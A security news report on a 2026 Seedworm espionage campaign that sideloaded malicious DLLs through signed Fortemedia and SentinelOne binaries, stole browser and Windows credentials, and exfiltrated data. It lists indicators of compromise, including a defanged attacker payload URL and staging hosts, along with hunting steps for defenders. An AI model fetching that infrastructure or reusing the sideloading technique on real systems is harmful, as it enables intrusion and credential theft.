Iran-Linked Seedworm Hackers Abuse Signed Fortemedia and SentinelOne Binaries in Espionage Campaign
7 min. read 
Published on
Iran-linked Seedworm hackers have been tied to a new cyber-espionage campaign that abused signed Fortemedia and SentinelOne binaries to sideload malicious DLL files on victim systems.
The campaign targeted at least nine organizations across nine countries and four continents during the first quarter of 2026. Victims included a major South Korean electronics manufacturer, government agencies, industrial manufacturers, financial services firms, educational institutions, and an international airport in the Middle East.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
Symantec’s Threat Hunter Team linked the activity to Seedworm, also tracked as MuddyWater, Static Kitten, Temp Zagros, and Mango Sandstorm. The group is widely associated with Iran’s Ministry of Intelligence and Security and has a long history of cyber-espionage operations.
What happened in the Seedworm campaign
The most notable intrusion involved a major South Korean electronics manufacturer. Researchers said Seedworm remained inside the company’s network for about a week in February 2026, between February 20 and February 27.
The attackers appeared focused on intelligence collection, credential theft, and network access rather than quick disruption. Their targets suggest an interest in intellectual property, government information, sensitive business data, and possible downstream access to customers or partners.
The campaign also showed a more disciplined approach than older Seedworm activity. The group used legitimate tools, signed binaries, Node.js-based loaders, PowerShell scripts, public file-transfer services, and multiple credential theft methods to reduce detection opportunities.
How the DLL sideloading worked
Seedworm used DLL sideloading, a technique where attackers place a malicious DLL next to a legitimate executable that loads it automatically or through an unsafe search path.
In this campaign, the attackers used fmapp.exe, a legitimate Fortemedia audio-driver utility, to load a malicious DLL named fmapp.dll. They also used sentinelmemoryscanner.exe, a legitimate SentinelOne component, to load a malicious DLL named sentinelagentcore.dll.
This does not mean Fortemedia or SentinelOne were compromised. The attackers abused trusted, signed software to make malicious execution look less suspicious during endpoint review.
| Technique | Legitimate file abused | Malicious file loaded | Purpose |
|---|---|---|---|
| DLL sideloading | fmapp.exe | fmapp.dll | Load malicious code through a trusted Fortemedia utility |
| DLL sideloading | sentinelmemoryscanner.exe | sentinelagentcore.dll | Load malicious code through a trusted SentinelOne component |
ChromElevator used for browser data theft
The malicious DLL files carried ChromElevator, a post-exploitation tool designed to steal data from Chromium-based browsers.
That can include saved passwords, cookies, browsing data, and payment card details stored in browser profiles. Browser theft can help attackers bypass normal login barriers if stolen cookies still allow access to corporate applications.
Researchers also found that node.exe launched the sideloading chains in observed cases. This suggests automated Node.js-based tooling drove parts of the operation, rather than a hands-on operator manually launching every step.
Seedworm used PowerShell, registry changes, and credential tools
After gaining access, Seedworm used PowerShell for reconnaissance, screenshots, payload downloads, persistence, credential theft, and SOCKS5 proxy tunneling.
The group also made registry changes to keep its loader chain running after user login. This gave the attackers a way to maintain access even after a restart or user session change.
Credential theft played a central role in the campaign. The attackers dumped Windows registry hives, used fake Windows login prompts, and deployed tools that could extract Kerberos tickets without requiring a domain administrator password.
- Host and domain reconnaissance helped Seedworm map the victim environment.
- WMI checks helped the attackers identify security products.
- Screenshot capture gave visibility into user activity and system state.
- Registry hive theft provided material for offline password cracking.
- Fake login prompts helped collect plaintext credentials.
- SOCKS5 proxy tooling supported stealthy network access.
Data was moved through a public file-transfer service
Seedworm used sendit.sh, a public file-transfer service, to exfiltrate stolen data. This choice can help malicious transfers blend into normal outbound web traffic.
Public file-sharing services create a challenge for defenders because they often appear in legitimate business workflows. Blocking them outright may disrupt users, but ignoring them gives attackers an easy exfiltration path.
Security teams should monitor unexpected uploads to consumer file-transfer platforms, especially from sensitive systems, administrator workstations, development machines, and servers with access to confidential data.
Key indicators of compromise
Defenders can use the following indicators as hunting leads. They should not rely only on hashes and IP addresses, since attackers can change infrastructure quickly.
| Type | Indicator | Description |
|---|---|---|
| SHA-256 | e25892603c42e34bd7ba0d8ea73be600d898cadc290e3417a82c04d6281b743b | fmapp.exe legitimate sideloading binary |
| SHA-256 | c6182fd01b14d84723e3c9d11bc0e16b34de6607ccb8334fc9bb97c1b44f0cde | fmapp.dll malicious sideloaded DLL |
| SHA-256 | 128b58a2a2f1df66c474094aacb7e50189025fbf45d7cd8e0834e93a8fbed667 | sentinelmemoryscanner.exe legitimate sideloading binary |
| SHA-256 | 0c9b911935a3705b0ad569446804d80026feb6db3884aeb240b6c76e9b8cf139 | sentinelagentcore.dll malicious sideloaded DLL |
| IP address | 179.43.177[.]220 | Attacker-controlled staging server |
| Domain | timetrakr[.]cloud | Attacker-owned staging domain |
| Domain | sendit[.]sh | Public file-transfer service used for exfiltration |
| URL | http://179.43.177[.]220:8080/nm.ps1 | PowerShell payload download URL |
Why this matters for defenders
The campaign shows how state-linked actors can use legitimate software to hide malicious activity. Signed binaries often receive more trust from users, security tools, and incident responders.
DLL sideloading also makes detection harder because the visible process may appear legitimate. The real payload may sit in the DLL loaded by that trusted executable.
Organizations should treat unusual combinations of signed executables and unexpected DLL files as suspicious, especially when they appear in temporary directories, user-writable folders, staging paths, or locations unrelated to the original vendor software.
What security teams should check
Security teams should review endpoint telemetry for unusual node.exe process trees, PowerShell downloads from external servers, and signed binaries loading DLL files from suspicious locations.
They should also review registry run keys, scheduled tasks, browser credential access, file-transfer activity, and outbound connections to known infrastructure from the campaign.
Because Seedworm used several credential theft methods, responders should assume that affected hosts may expose both browser credentials and Windows authentication material.
- Search for fmapp.exe loading fmapp.dll from unexpected paths.
- Search for sentinelmemoryscanner.exe loading sentinelagentcore.dll outside normal product directories.
- Review node.exe processes that launch signed third-party binaries or PowerShell.
- Check PowerShell logs for downloads from external IP addresses or unknown domains.
- Audit registry run keys for suspicious persistence entries.
- Review outbound transfers to public file-sharing platforms.
- Rotate credentials from systems where browser or registry hive theft is suspected.
- Review Kerberos activity for unusual ticket extraction or lateral movement patterns.
Seedworm’s campaign shows a quieter espionage model
Seedworm has used noisy and visible techniques in past campaigns, but this activity shows a more careful operating style.
The group combined trusted binary abuse, automated loaders, credential theft, persistence, proxy tooling, and public file-transfer services into a practical espionage workflow.
For defenders, the main lesson is that signed software alone does not prove safe behavior. Security teams need to monitor how trusted binaries run, what DLLs they load, where those files reside, and which parent processes launched them.
FAQ
Seedworm is an Iran-linked cyber-espionage group also tracked as MuddyWater, Static Kitten, Temp Zagros, and Mango Sandstorm. It has targeted government and private-sector organizations in multiple regions since at least 2017.
Seedworm targeted at least nine organizations across nine countries and four continents. The group abused signed Fortemedia and SentinelOne binaries for DLL sideloading, stole credentials, used PowerShell, and exfiltrated data through a public file-transfer service.
The available reporting does not show that Fortemedia or SentinelOne were breached. The attackers abused legitimate signed binaries from those vendors to load malicious DLL files through sideloading.
DLL sideloading is an attack technique where a legitimate executable loads a malicious DLL file. Attackers often use it to make malicious activity appear as if it came from trusted software.
Organizations should monitor unusual node.exe process trees, PowerShell downloads, signed binaries loading unexpected DLLs, registry persistence, browser credential access, public file-transfer uploads, and outbound traffic to known Seedworm infrastructure.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages